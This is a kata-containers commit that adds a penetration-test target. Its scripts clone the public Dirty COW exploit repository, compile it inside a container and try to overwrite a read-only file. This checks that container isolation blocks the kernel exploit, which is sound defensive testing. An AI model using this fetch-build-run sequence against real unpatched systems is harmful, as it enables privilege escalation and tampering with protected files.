security: Add security tests

Add security tests for: * dirtycow Add `pentest` Makefile target fixes kata-containers#750 Signed-off-by: Julio Montes <[email protected]>
devimc · Sep 24, 2018 · 28a7471 · 28a7471
1 parent 003944d
commit 28a7471
Show file tree

Hide file tree

Showing 4 changed files with 78 additions and 0 deletions.
diff --git a/Makefile b/Makefile
@@ -84,6 +84,9 @@ openshift:
 	bash -f .ci/install_bats.sh
 	bash -f integration/openshift/run_openshift_tests.sh
 
+pentest:
+	bash -f pentest/all.sh
+
 vm-factory:
 	bash -f integration/vm_factory/vm_templating_test.sh
 
@@ -104,6 +107,7 @@ check: checkcommits log-parser
 	kubernetes \
 	log-parser \
 	openshift \
+	pentest \
 	swarm \
 	test \
 	vm-factory
diff --git a/pentest/all.sh b/pentest/all.sh
@@ -0,0 +1,15 @@
+#!/bin/bash
+#
+# Copyright (c) 2018 Intel Corporation
+#
+# SPDX-License-Identifier: Apache-2.0
+#
+
+tests_dir=$(dirname $0)
+
+bash -f "${tests_dir}/dirtycow.sh" &> /dev/null
+if [ $? != 0 ]; then
+	echo "[NOT OK] dirtycow test"
+	exit 1
+fi
+echo "[OK] dirtycow test"
diff --git a/pentest/dirtycow.sh b/pentest/dirtycow.sh
@@ -0,0 +1,47 @@
+#!/bin/bash
+#
+# Copyright (c) 2018 Intel Corporation
+#
+# SPDX-License-Identifier: Apache-2.0
+#
+
+source "$(dirname $0)/lib.sh"
+
+container_name="dirtycow"
+runtime=${RUNTIME:-kata-runtime}
+test_repo="https://github.com/dirtycow/dirtycow.github.io"
+test_dir="/root/dirtycow"
+test_file="$test_dir/test"
+test_file_content="Hello"
+dirty_file_content="pwned"
+
+finish() {
+	docker rm -f "$container_name"
+}
+trap finish EXIT
+
+# Run a gcc container
+docker run --runtime="$runtime" --name="$container_name" -dti gcc bash
+
+# Turning off periodic writeback makes exploit stable
+# This should fail inside a container
+docker exec "$container_name" bash -c "echo 0 > /proc/sys/vm/dirty_writeback_centisecs"
+[ $? == 0 ] && die "Turned off periodic writeback"
+
+# Clone dirtycow repo
+docker exec "$container_name" git clone "$test_repo" "$test_dir"
+
+# Create and set as readonly the test file
+docker exec "$container_name" bash -c "echo $test_file_content > $test_file; chmod 0404 $test_file"
+
+# Build dirtycow
+docker exec -w "$test_dir" "$container_name" gcc -pthread dirtyc0w.c -o dirtyc0w
+
+# Run dirtycow
+docker exec -w "$test_dir" "$container_name" ./dirtyc0w "$test_file" "$dirty_file_content"
+
+# Check if test file was modified
+docker exec -w "$test_dir" "$container_name" grep -q "$test_file_content" "$test_file"
+[ $? == 1 ] && die "Modified read only file"
+
+exit 0
diff --git a/pentest/lib.sh b/pentest/lib.sh
@@ -0,0 +1,12 @@
+#!/bin/bash
+#
+# Copyright (c) 2018 Intel Corporation
+#
+# SPDX-License-Identifier: Apache-2.0
+#
+
+die(){
+	msg="$*"
+	echo "ERROR: $msg" >&2
+	exit 1
+}